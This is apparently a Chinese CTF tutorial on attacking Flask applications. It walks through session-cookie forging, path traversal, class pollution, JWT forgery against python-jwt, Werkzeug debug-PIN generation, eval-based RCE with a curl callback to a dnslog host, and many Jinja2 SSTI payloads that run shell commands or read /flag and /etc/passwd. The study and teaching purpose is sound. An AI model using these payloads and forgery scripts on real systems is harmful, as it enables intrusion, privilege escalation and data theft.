介绍 Python-Flask简介
Flask是一个Web应用程序框架,使用Python编写。该软件由ArminRonacher开发,他领导着Pocco国际Python爱好者小组。该软件基于WerkzeugWSGI工具箱和Jinja2模板引擎.
Flask有许多扩展,例如ORM、窗体验证工具、文件上传、身份验证,
使用Flask可以快速地搭建一个WEB应用,Flask默认使用Jinja2作为模板,Flask会自动配置Jinja 模板而不需要其他配置
本文所有程序已打包:/static/post/CTF_Python_Flask/ext/ext.zip
一个简单的示例 基本的Flask Web应用 源码 Flask应用的默认端口是5000,可以使用port=指定端口
flask_basic.py
1 2 3 4 5 6 7 8 9 10 11 12 from flask import Flask app = Flask(__name__) @app.route('/' ) def hello_world (): return 'Hello Flask!' if __name__ == '__main__' : app.run()
访问 直接访问,可见
带获取GET请求参数功能的Flask Web应用 源码 flask_basic_get.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 from flask import Flask, request app = Flask(__name__) @app.route('/' ) def hello_world (): try : r = request.args.get('name' ) return "Hello " + r except : pass return "Hello" if __name__ == '__main__' : app.run()
访问 get传参name=abc可见
带获取POST请求参数功能的Flask Web应用 源码 flask_basic_post.py
1 2 3 4 5 6 7 8 9 10 11 12 from flask import Flask, request app = Flask(__name__) @app.route('/' , methods=['POST' ] ) def hello_world (): r = request.form.get('name' ) print(r) return "Hello " + r if __name__ == '__main__' : app.run()
访问 post传参name=a后可见
带session功能的Flask Web应用 源码 flask_basic_session.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import osimport reimport timeimport subprocessfrom flask import Flask, make_response, sessionapp = Flask(__name__) app.config['SECRET_KEY' ] = 'AAAAAAAAAA' def response (content, status ): resp = make_response(content, status) return resp @app.route('/' , methods=['GET' ] ) def main (): if not session.get('user' ): session['user' ] = 'Guest' try : user = session.get('user' ) return 'Hello ' + user except : return response("Not Found." , 404 ) if __name__ == '__main__' : app.run()
访问 可以看到成功获取了session中user的值
Flask的session的内容放在客户端中的cookie
CTF中的Flask应用 SESSION相关 获取SESSION中保存的重要信息 flask中session是保存在客户机上的,并且只需进行简单的base64解码操作即可读取session的内容
flask在生成session时会使用app.config[‘SECRET_KEY’]中的值作salt对session进行签名
也就是说,flask保证session不被随意篡改,但不保证session的内容不随意泄露
可以使用以下程序获取session内容
源码 flask_session_decode.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 import sysimport zlibfrom base64 import b64decodefrom flask.sessions import session_json_serializerfrom itsdangerous import base64_decodedef decryption (payload ): payload, sig = payload.rsplit(b'.' , 1 ) payload, timestamp = payload.rsplit(b'.' , 1 ) decompress = False if payload.startswith(b'.' ): payload = payload[1 :] decompress = True try : payload = base64_decode(payload) except Exception as e: raise Exception('Could not base64 decode the payload because of ' 'an exception' ) if decompress: try : payload = zlib.decompress(payload) except Exception as e: raise Exception('Could not zlib decompress the payload before ' 'decoding the payload' ) return session_json_serializer.loads(payload) if __name__ == '__main__' : print(decryption(sys.argv[1 ].encode()))
例如有session如下
1 eyJ1cGRpciI6ImZpbGVpbmZvLy4uIiwidXNlciI6IkFkbWluaXN0cmF0b3IifQ.Y0Fj2g.UXNKMoSXrDAqOt90FWrOtZa9iNI
解码命令 1 python flask_session_decode.py session内容
SESSION伪造 未知secret_key 读取内存获取secret key 此部分详见本文Cat cat 部分
通过任意文件读取直接读取app.py,适用于secret_key直接写在 (app.py路径可能在/proc/self/cmdline
查看当前进程的命令中可以获取)
通过任意文件读取先通过/proc/self/maps
读取堆栈分布, 再通过/proc/self/mem
读取内存分布来获取
读到secret_key后进入下面的已知secret_key伪造
部分
已知secret_key伪造 伪造的SESSION可以达到修改信息的目的(因为flask的session存放在客户端)
使用以下程序可以伪造session
flask_session_cookie_manager3.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 """ Flask Session Cookie Decoder/Encoder """ __author__ = 'Wilson Sumanang, Alexandre ZANNI' import sysimport zlibfrom itsdangerous import base64_decodeimport astif sys.version_info[0 ] < 3 : raise Exception('Must be using at least Python 3' ) elif sys.version_info[0 ] == 3 and sys.version_info[1 ] < 4 : from abc import ABCMeta, abstractmethod else : from abc import ABC, abstractmethod import argparsefrom flask.sessions import SecureCookieSessionInterfaceclass MockApp (object ): def __init__ (self, secret_key ): self.secret_key = secret_key if sys.version_info[0 ] == 3 and sys.version_info[1 ] < 4 : class FSCM (metaclass=ABCMeta ): def encode (secret_key, session_cookie_structure ): """ Encode a Flask session cookie """ try : app = MockApp(secret_key) session_cookie_structure = dict (ast.literal_eval(session_cookie_structure)) si = SecureCookieSessionInterface() s = si.get_signing_serializer(app) return s.dumps(session_cookie_structure) except Exception as e: return "[Encoding error] {}" .format (e) raise e def decode (session_cookie_value, secret_key=None ): """ Decode a Flask cookie """ try : if (secret_key==None ): compressed = False payload = session_cookie_value if payload.startswith('.' ): compressed = True payload = payload[1 :] data = payload.split("." )[0 ] data = base64_decode(data) if compressed: data = zlib.decompress(data) return data else : app = MockApp(secret_key) si = SecureCookieSessionInterface() s = si.get_signing_serializer(app) return s.loads(session_cookie_value) except Exception as e: return "[Decoding error] {}" .format (e) raise e else : class FSCM (ABC ): def encode (secret_key, session_cookie_structure ): """ Encode a Flask session cookie """ try : app = MockApp(secret_key) session_cookie_structure = dict (ast.literal_eval(session_cookie_structure)) si = SecureCookieSessionInterface() s = si.get_signing_serializer(app) return s.dumps(session_cookie_structure) except Exception as e: return "[Encoding error] {}" .format (e) raise e def decode (session_cookie_value, secret_key=None ): """ Decode a Flask cookie """ try : if (secret_key==None ): compressed = False payload = session_cookie_value if payload.startswith('.' ): compressed = True payload = payload[1 :] data = payload.split("." )[0 ] data = base64_decode(data) if compressed: data = zlib.decompress(data) return data else : app = MockApp(secret_key) si = SecureCookieSessionInterface() s = si.get_signing_serializer(app) return s.loads(session_cookie_value) except Exception as e: return "[Decoding error] {}" .format (e) raise e if __name__ == "__main__" : parser = argparse.ArgumentParser( description='Flask Session Cookie Decoder/Encoder' , epilog="Author : Wilson Sumanang, Alexandre ZANNI" ) subparsers = parser.add_subparsers(help ='sub-command help' , dest='subcommand' ) parser_encode = subparsers.add_parser('encode' , help ='encode' ) parser_encode.add_argument('-s' , '--secret-key' , metavar='<string>' , help ='Secret key' , required=True ) parser_encode.add_argument('-t' , '--cookie-structure' , metavar='<string>' , help ='Session cookie structure' , required=True ) parser_decode = subparsers.add_parser('decode' , help ='decode' ) parser_decode.add_argument('-s' , '--secret-key' , metavar='<string>' , help ='Secret key' , required=False ) parser_decode.add_argument('-c' , '--cookie-value' , metavar='<string>' , help ='Session cookie value' , required=True ) args = parser.parse_args() if (args.subcommand == 'encode' ): if (args.secret_key is not None and args.cookie_structure is not None ): print(FSCM.encode(args.secret_key, args.cookie_structure)) elif (args.subcommand == 'decode' ): if (args.secret_key is not None and args.cookie_value is not None ): print(FSCM.decode(args.cookie_value,args.secret_key)) elif (args.cookie_value is not None ): print(FSCM.decode(args.cookie_value))
encode.py
1 2 3 4 5 6 7 8 9 10 from flask_session_cookie_manager3 import FSCMsecret_key = "engine-1" data = '{"updir":"fileinfo/..","user":"Administrator"}' d = FSCM.encode(secret_key, data) print(d)
flask_session_cookie_manager使用方法 命令行使用 注意需要python3
1 python flask_session_cookie_manager3.py encode -s "secret的值" -t "内容"
以调用包的形式 将flask_session_cookie_manager3.py和encode.py放在同一个目录
然后运行encode.py,结果就是伪造的session
装饰器 Python 装饰器顺序错误导致的未授权访问 RealWorld CTF 2018 bookhub 源码如下,可以看到函数有两个装饰器,
一个是用于检查是否已经登录的装饰器login_required,另一个是flask的路由的装饰器,用于刷新session
如下代码这样子是存在问题的
1 2 3 4 @login_required @user_blueprint.route('/admin/system/refresh_session/' , methods=['POST' ] ) def refresh_session (): anyCode
Python中,装饰器的执行顺序是从靠近函数的装饰器开始的
当我们需要先验证有没有登录,再验证用户权限时,应该像下面这样写
1 2 3 4 @login_required @permision_allowed def f () anyCode
下面这个是对上面提及的存在问题的代码的实际顺序解释,这样导致的结果就是鉴权失败
1 2 3 4 5 6 def refresh_session (): pass route_wrapped = app.route('/admin/refresh_session/' )(refresh_session) login_wrapped = login_required(route_wrapped)
引用自http://blog.evalbug.com/2018/08/07/flask_decorator_sequence/
所以正确写法应当如下代码所示
1 2 3 4 @user_blueprint.route('/admin/system/refresh_session/' , methods=['POST' ] ) @login_required def refresh_session (): anyCode
任意文件读取 Python原型链污染导致的任意文件读取 DASCTF-2023-7月赛-ezflask 先来看源码(以下代码可以直接运行,前提是装好flask)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 import uuidfrom flask import Flask, request, sessionimport jsonapp = Flask(__name__) app.secret_key = str (uuid.uuid4()) black_list = ["__init__" ] def check (data ): for i in black_list: if i in data: return False return True def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v) class user (): def __init__ (self ): self.username = "" self.password = "" pass def check (self, data ): if self.username == data['username' ] and self.password == data['password' ]: return True return False Users = [] @app.route('/register' ,methods=['POST' ] ) def register (): if request.data: try : if not check(request.data): return "Register Failed" data = json.loads(request.data) if "username" not in data or "password" not in data: return "Register Failed" User = user() merge(data, User) Users.append(User) except Exception: return "Register Failed" return "Register Success" else : return "Register Failed" @app.route('/login' ,methods=['POST' ] ) def login (): if request.data: try : data = json.loads(request.data) if "username" not in data or "password" not in data: return "Login Failed" for user in Users: if user.check(data): session["username" ] = data["username" ] return "Login Success" except Exception: return "Login Failed" return "Login Failed" @app.route('/' ,methods=['GET' ] ) def index (): return open (__file__, "r" ).read() if __name__ == "__main__" : app.run(host="0.0.0.0" , port=5010 )
简单看一遍源码,容易发现以下部分比较特殊
1 2 3 4 5 6 7 8 9 10 11 def merge (src, dst ): for k, v in src.items(): if hasattr (dst, '__getitem__' ): if dst.get(k) and type (v) == dict : merge(v, dst.get(k)) else : dst[k] = v elif hasattr (dst, k) and type (v) == dict : merge(v, getattr (dst, k)) else : setattr (dst, k, v)
再配合上这个user类,非常容易想到原型链污染
详情建议看看这篇文章,解释的非常清楚:https://tttang.com/archive/1876/
1 2 3 4 5 6 7 8 9 class user (): def __init__ (self ): self.username = "" self.password = "" pass def check (self, data ): if self.username == data['username' ] and self.password == data['password' ]: return True return False
仔细阅读代码,可以发现有一个读文件的地方
所以我们可以对魔术变量__file__
进行污染
1 2 3 @app.route('/' ,methods=['GET' ] ) def index (): return open (__file__, "r" ).read()
如果对flask这个框架的配置有所了解的话,还可以选择static_folder这个全局变量进行污染
因为flask可以通过static_folder配置用于放置css、js等静态文件的目录,
设置后即可直接通过url访问文件,例如访问http://[server]/etc/passwd
1 2 3 4 5 6 7 8 9 10 11 12 13 def __init__ ( self, import_name, static_url_path=None , static_folder='static' , static_host=None , host_matching=False , subdomain_matching=False , template_folder='templates' , instance_path=None , instance_relative_config=False , root_path=None ):
根据上面链接的文章描述,容易构造出以下payload
1 2 3 4 5 6 7 { "__init__" : { "__globals__" : { "__file__" :"/etc/passwd" } } }
再来看下如何进行原型链污染
容易发现它取了post的内容,经过check函数后进行json反序列化,最后再merge生成user对象
也就是说我们直接post json即可
1 2 3 4 5 6 7 8 9 10 11 12 @app.route('/register' ,methods=['POST' ] ) def register (): if request.data: try : if not check(request.data): return "Register Failed" data = json.loads(request.data) if "username" not in data or "password" not in data: return "Register Failed" User = user() merge(data, User) Users.append(User)
只需要构造以下内容
1 2 3 4 5 6 7 8 9 { "username" :"a" ,"password" :"b" ,"__init__" : { "__globals__" : { "__file__" :"/etc/passwd" } } }
那么问题来了,__init__
被check函数过滤了,要怎么办呢?
这里给出两种解法:
第一种是利用Python json库的解析特性和python字符串判断的差异,使用Unicode绕过
1 2 3 4 5 6 7 { "__init\u005f_" : { "__globals__" : { "__file__" :"/etc/passwd" } } }
(想理解下边这个解法的话可以看看上面链接的文章,讲的非常好)
1 2 3 4 5 6 7 { "check" : { "__globals__" : { "__file__" :"/etc/passwd" } } }
后面的考点就是伪造pin码RCE了,这里就不多解释了,本文已有记载
配合目录穿越 2022网鼎杯-web669 直接读取文件、参数可控且过滤不全
以下为部分关键代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 @app.route('/<path:file>' , methods=['GET' ] ) def download (file ): if session.get('updir' ): basedir = session.get('updir' ) try : path = os.path.join(basedir, file).replace('../' , '' ) if os.path.isfile(path): return send_file(path) else : return response("Not Found." , 404 ) except : return response("Failed." , 500 )
由于对../的处理只是简单使用replace方法进行替换置空,因此使用双写../(....//
)即可进行绕过
1 path = os.path.join(basedir, file).replace('../' , '' )
然后接下来使用flask的send_file模块读取文件
1 2 if os.path.isfile(path): return send_file(path)
实现了任意文件读取
使用open打开文件但未close 配合任意文件读取/proc/self/fd
2020网鼎杯白虎组Web-PicDown app.py源码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 from flask import Flask, Responsefrom flask import render_templatefrom flask import requestimport osimport urllibapp = Flask(__name__) SECRET_FILE = "/tmp/secret.txt" f = open (SECRET_FILE) SECRET_KEY = f.read().strip() os.remove(SECRET_FILE) @app.route('/' ) def index (): return render_template('search.html' ) @app.route('/page' ) def page (): url = request.args.get("url" ) try : if not url.lower().startswith("file" ): res = urllib.urlopen(url) value = res.read() response = Response(value, mimetype='application/octet-stream' ) response.headers['Content-Disposition' ] = 'attachment; filename=beautiful.jpg' return response else : value = "HACK ERROR!" except : value = "SOMETHING WRONG!" return render_template('search.html' , res=value) @app.route('/no_one_know_the_manager' ) def manager (): key = request.args.get("key" ) print(SECRET_KEY) if key == SECRET_KEY: shell = request.args.get("shell" ) os.system(shell) res = "ok" else : res = "Wrong Key!" return res if __name__ == '__main__' :app.run(host='0.0.0.0' , port=8080 )
任意文件读取 任意文件读取由以下代码实现
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 @app.route('/page' ) def page (): url = request.args.get("url" ) try : if not url.lower().startswith("file" ): res = urllib.urlopen(url) value = res.read() response = Response(value, mimetype='application/octet-stream' ) response.headers['Content-Disposition' ] = 'attachment; filename=beautiful.jpg' return response else : value = "HACK ERROR!" except : value = "SOMETHING WRONG!" return render_template('search.html' , res=value)
代码审计 SECRET_KEY藏在/tmp/secret.txt,可是已经被删除了
但是可以发现没有使用f.close()关闭文件句柄
1 2 3 4 SECRET_FILE = "/tmp/secret.txt" f = open (SECRET_FILE) SECRET_KEY = f.read().strip() os.remove(SECRET_FILE)
以下程序可以执行shell, 但是需要key,即前面提到的SECRET_KEY
1 2 3 4 5 6 7 8 9 10 11 12 @app.route('/no_one_know_the_manager' ) def manager (): key = request.args.get("key" ) print(SECRET_KEY) if key == SECRET_KEY: shell = request.args.get("shell" ) os.system(shell) res = "ok" else : res = "Wrong Key!" return res
已知使用open打开文件会创建文件描述符 ,
即在/proc/self/fd中创建名为x的”文件”(x代表一个整数)(unix万物皆为文件的思想)
由于此次读取文件没有进行close操作,创建文件描述符的文件描述符还没有删除,
可以直接读取/proc/self/fd/x,x可以从1开始逐渐增加来穷举,读到的内容就是/tmp/secret.txt的内容
示例payload如下
1 /page?url=../../../../proc/self/fd/1
解释如下:
当程序打开一个文件, 会获得程序的文件描述符, 而此时如果文件被删除, 只会删除文件的目录项, 不会清空文件的内容, 原来的进程依然可以通过描述符对文件进行读取, 也就是说, 文件还存在内存里
文件上传(配合软链接) 2022美团杯-OnlineUnzip 题目允许用户上传zip文件
以下代码是服务端使用unzip命令解压用户上传的zip文件的实现
unzip命令默认禁止了zip slip,即虽然zip文件可以打包包含../路径的文件,但unzip命令解压时会忽略../(避免了任意写文件)
zip slip
通过目录遍历文件名(例如../../evil.sh)的精心构建的存档文件攻击者可以通过Zip Slip 漏洞把恶意文件复制到操作系统中(超出应用本身的控制范围之外)。Zip Slip漏洞可影响多种存档格式,包括zip、tar、jar、war、cpio、apk、rar和7z。
1 2 3 4 5 6 7 8 9 10 11 def extractFile (filepath ): extractdir=filepath.split('.' )[0 ] if not os.path.exists(extractdir): os.makedirs(extractdir) os.system(f'unzip -o {filepath} -d {extractdir} ' ) return redirect(url_for('display' ,extractdir=extractdir))
解压的文件由以下代码实现文件列表展示(使用os.listdir进行目录读取,使用open进行文件读取)
不允许出现..
,避免了目录穿越
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 @app.route('/display' , methods=['GET' ] ) @app.route('/display/' , methods=['GET' ] ) @app.route('/display/<path:extractdir>' , methods=['GET' ] ) def display (extractdir='' ): if re.search(r"\.\." , extractdir, re.M | re.I) != None : return "Hacker?" else : if not os.path.exists(extractdir): return make_response("error" , 404 ) else : if not os.path.isdir(extractdir): f = open (extractdir, 'rb' ) response = make_response(f.read()) response.headers['Content-Type' ] = 'application/octet-stream' return response else : fn = os.listdir(extractdir) fn = [".." ] + fn f = open ("templates/template.html" ) x = f.read() f.close() ret = "<h1>文件列表:</h1><br><hr>" for i in fn: tpath = os.path.join('/display' , extractdir, i) ret += "<a href='" + tpath + "'>" + i + "</a><br>" x = x.replace("HTMLTEXT" , ret) return x
创建一个根目录的软连接
然后进行zip压缩(-y参数用于保持软连接)
1 zip -r myzip.zip root_dir -y
zip内容如下
上传之后即可遍历根目录,并读取文件
如何避免目录穿越 避免用户直接控制读取文件的参数从而能够读取磁盘上的任意文件
使用静态资源 所有静态资源可以被访问者直接获取
默认位置
FLASK APP运行目录下的static文件夹为静态目录
1 2 3 4 5 6 from flask import Flaskapp = Flask(__name__)
设置静态目录
1 2 3 4 5 6 >from flask import Flask app = Flask(import_name=__name__, static_url_path='/static' , static_folder='static' )
引用自https://blog.51cto.com/u_11239407/5437426
使用Flask的动态路由 (URL路径参数)
参数类型说明
动态路由的参数类型默认是 string,但是也可以指定其他类型,比如数字 int 等
类型
说明
string
默认,可以不用写
int
同 int,但是仅接受浮点数
float
同 int,但是仅接受浮点数
path
和 string 相似,但接受斜线
引用自https://blog.51cto.com/u_12020737/3090824
注意:使用string类型的路径参数仍然存在目录穿越的可能
示例 用户通过访问/file/id读取信息
通过open直接打开文件
1 2 3 4 5 6 7 8 9 10 11 @app.route('/file/<int:id>' ) def user_info (id ): try : path = f'static/{id } .json' if os.path.isfile(path): with open (path, 'rb' ) as file: return file.read() except : return 'Err' , 500 return '404 Not Found' , 404
通过flask的sendfile模块
1 2 3 4 5 6 7 8 9 10 11 12 from flask import send_file@app.route('/file/<int:id>' ) def user_info (id ): try : path = f'static/{id } .json' if os.path.isfile(path): return send_file(path) except : return 'Err' , 500 return '404 Not Found' , 404
JWT相关 通过JWT库的漏洞 python-jwt 这个库在版本< 3.3.4存在漏洞
详情可以查看此处:https://github.com/davedoesdev/python-jwt/security/advisories/GHSA-5p8v-58qm-c7fp
JWT伪造 摘录自测试用例https://github.com/davedoesdev/python-jwt/blob/master/test/vulnerability_vows.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 import jsonfrom jwcrypto.common import base64url_decode, base64url_encodedef topic (topic ): [header, payload, signature] = topic.split('.' ) parsed_payload = json.loads(base64url_decode(payload)) parsed_payload['sub' ] = 'bob' parsed_payload['exp' ] = 2000000000 fake_payload = base64url_encode((json.dumps(parsed_payload, separators=(',' , ':' )))) return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}' jwt = "xxxx.xxx.xxx" print(topic(jwt))
2022祥云杯 FunWEB 此题需要使key'is_admin'
的value为1来获取graphql 查询权限
伪造jwt的EXP如下(注意token每过一段时间会过期,需要重新生成)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from datetime import timedeltafrom json import loads, dumpsfrom jwcrypto.common import base64url_decode, base64url_encodedef topic (topic ): """ Use mix of JSON and compact format to insert forged claims including long expiration """ [header, payload, signature] = topic.split('.' ) parsed_payload = loads(base64url_decode(payload)) parsed_payload['is_admin' ] = 1 parsed_payload['exp' ] = 2000000000 fake_payload = base64url_encode((dumps(parsed_payload, separators=(',' , ':' )))) return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}' token = topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxMzcwMzAsImlhdCI6MTY2NzEzNjczMCwiaXNfYWRtaW4iOjAsImlzX2xvZ2luIjoxLCJqdGkiOiJ4YWxlR2dadl9BbDBRd1ZLLUgxb0p3IiwibmJmIjoxNjY3MTM2NzMwLCJwYXNzd29yZCI6IjEyMyIsInVzZXJuYW1lIjoiMTIzIn0.YnE5tK1noCJjultwUN0L1nwT8RnaU0XjYi5iio2EgbY7HtGNkSy_pOsnRl37Y5RJvdfdfWTDCzDdiz2B6Ehb1st5Fa35p2d99wzH4GzqfWfH5zfFer0HkQ3mIPnLi_9zFiZ4mQCOLJO9RBL4lD5zHVTJxEDrESlbaAbVOMqPRBf0Z8mon1PjP8UIBfDd4RDlIl9wthO-NlNaAUp45woswLe9YfRAQxN47qrLPje7qNnHVJczvvxR4-zlW0W7ahmYwODfS-KFp8AC80xgMCnrCbSR0_Iy1nsiCEO8w2y3BEcqvflOOVt_lazJv34M5e28q0czbLXAETSzpvW4lVSr7g' ) print(token)
此exp原文链接:https://blog.csdn.net/m0_64910183/article/details/127661200
RCE(远程代码/命令执行) 通过代码中存在的漏洞 一个简单的计算表达式的服务,使用了eval函数
get传参eval即可代码执行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 from flask import Flask, request app = Flask(__name__) @app.route('/' ) def hello_world (): try : r = request.args.get('eval' ) return f"Result:{eval (r)} " except Exception as e: print(e) pass return "Hello" if __name__ == '__main__' : app.run()
传参如下实现无回显命令执行(相当于执行os.system()
,执行curl y3j4ey.dnslog.cn
)
1 __import__('os').system('curl y3j4ey.dnslog.cn')
DNSLog显示有请求
通过伪造debug pin码(需要读取主机上几个文件) (前提是开启调试模式)
示例程序 flask_basic_get_debug_pin.py
由于没有处理r为None的情况,就把None Type的r直接与字符串”Hello “拼接导致出错
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from flask import Flask, request app = Flask(__name__) @app.route('/' ) def hello_world (): r = request.args.get('name' ) if r != '' : return "Hello " + r else : return "Hello" if __name__ == '__main__' : app.run(debug=True )
报错界面
点击右边小图标可进入调试模式
要求输入pin码
可以以交互模式执行python程序
需要 获取启动Flask应用的用户名(可以读取/etc/passwd获取)(获取username)
一般默认:flask.app(获取modname)
flask目录下的一个app.py的绝对路径(可以通过报错页面看到)(获取app.py的绝对路径)(类似:/usr/local/lib/python3.5/site-packages/flask/app.py)
以及读取以下几个文件
坑点:有的版本的flask只要读到三个文件中任意一个文件即可,
有的版本从/etc/machine-id、/proc/sys/kernel/random/boot_id中任意一个文件读到值后就和/proc/self/cgroup中的id值拼接)
pin码生成程序如下(适用于新版的flask) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 import hashlibfrom itertools import chainprobably_public_bits = [ 'root' , 'flask.app' , 'Flask' , '/usr/local/lib/python3.7/site-packages/flask/app.py' ] private_bits = [ '2485377892354' , '32e48d371198e8420c53b0a1fa37e94d' ] h = hashlib.sha1() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance (bit, str ): bit = bit.encode("utf-8" ) h.update(bit) h.update(b"cookiesalt" ) cookie_name = f"__wzd{h.hexdigest()[:20 ]} " num = None if num is None : h.update(b"pinsalt" ) num = f"{int (h.hexdigest(), 16 ):09d} " [:9 ] rv = None if rv is None : for group_size in 5 , 4 , 3 : if len (num) % group_size == 0 : rv = "-" .join( num[x : x + group_size].rjust(group_size, "0" ) for x in range (0 , len (num), group_size) ) break else : rv = num print(rv)
新旧版本flask debug pin码生成可以参考:https://blog.csdn.net/qq_42303523/article/details/124232532
区别是旧版计算摘要信息(digest)用的是md5,新版计算摘要信息用的是sha1
通过Debug模式热加载 flask开启debug模式时,当文件被修改(包括被import的py文件被修改),就会重启整个flask服务,相当于重新执行这个py文件
CISCN 2023 go_session 前面的go部分存在ssti(使用pongo2作为模板引擎)
可以传入参数name,利用c这个对象里面的方法
如下就是上传一个文件的payload
1 {%set form=c.Query(c.HandlerName|first)%}{%set path=c.Query(c.HandlerName|last)%}{%set file=c.FormFile(form)%}{{c.SaveUploadedFile(file,path)}}&m=xxx&n=xx
然后将保存地址设为app.py,覆盖原来的py程序,即可完成利用
SSTI(模板注入) 在实例化Flask APP对象时可以设置模板存放位置,然后flask渲染模板时会在此位置下找
1 2 app = Flask(import_name=__name__, template_folder='templates' )
Flask默认使用Jinja 2作为模板引擎
Jinja的语法有以下几种:
1 2 3 4 5 6 7 {%....%}语句(Statements) {f .…H}打印模板输出的表达式(Expressions) {#....#}注释 #...##行语句(Line Statements)
一个基本的flask模板使用 在字符串中使用模板 可以直接在字符串中使用{{` `}}
、{% ` `%}
等来制作模板
flask_basic_render.py
1 2 3 4 5 6 7 8 9 10 11 from flask import Flask, render_template_string app = Flask(__name__) @app.route('/' ) def hello_world (): n = "aaa" return render_template_string("Hello {{name}}" , name=n) if __name__ == '__main__' : app.run()
效果如下
在模板文件中 可以写在文件,比如index.html
然后将index.html放在templates文件夹中(默认模板文件夹是templates)
1 2 3 4 <html > <title > Title</title > <p > {{content}}</p > </html >
渲染模板
flask_basic_ren_html.py
1 2 3 4 5 6 7 8 9 10 11 from flask import Flask, render_template app = Flask(__name__) @app.route('/' ) def hello_world (): c = "Hello" return render_template("index.html" , content=c) if __name__ == '__main__' : app.run()
效果如下
可以发现{{content}}
已经被渲染了
一个基本的ssti漏洞 flask_basic_get_ssti.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from flask import Flask, render_template_string, request app = Flask(__name__) @app.route('/' ) def hello_world (): name='guest' r = request.args.get('name' ) if r != '' and r != None : name = r return render_template_string("Hello %s" % name) if __name__ == '__main__' : app.run()
代码执行 执行os.popen
1 {{().__class__.__bases__[0].__subclasses__()[140].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}
1 {%print(lipsum.__globals__['__geti''tem__']('o''s')['pop''en']('cat /f*').read())%}
1 {%print(lipsum|attr("__globals__"))|attr("__getitem__")("os")|attr("popen")("whoami")|attr("read")()%}
过滤单双引号
1 {{[].__class__.__mro__[-1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flag
过滤中括号和单双引号
1 {{url_for.__globals__.os.popen(request.cookies.cmd).read()}}
过滤下划线
1 {{(lipsum|attr(request.values.b)).os.popen(request.values.a).read()}}&a=cat%20/flag&b=__globals__
过滤os
1 {{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /flag
寻找可利用类 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合 __init__ 初始化类,返回的类型是function,通过此方法来调用 __globals__方法 __globals__ 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。 __dic__ 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里 __getattribute__() 实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。 __getitem__() 调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b') __builtins__ 这里 __builtins__ 是内建名称空间,是这个模块本身定义的一个名称空间,在这个内建名称空间中存在一些我们经常用到的内置函数(即不需要导入包即可调用的函数)如:print()、str()还包括一些异常和其他属性。 __import__ 动态加载类和函数,也就是导入模块,经常用于导入os模块, __str__() 返回描写这个对象的字符串,可以理解成就是打印出来。 url_for flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。 get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且get_flashed_messages.__globals__['__builtins__']含有current_app。 lipsum flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}} current_app 应用上下文,一个全局变量。 request.args.x1 get传参 request.values.x1 所有参数 request.cookies cookies参数 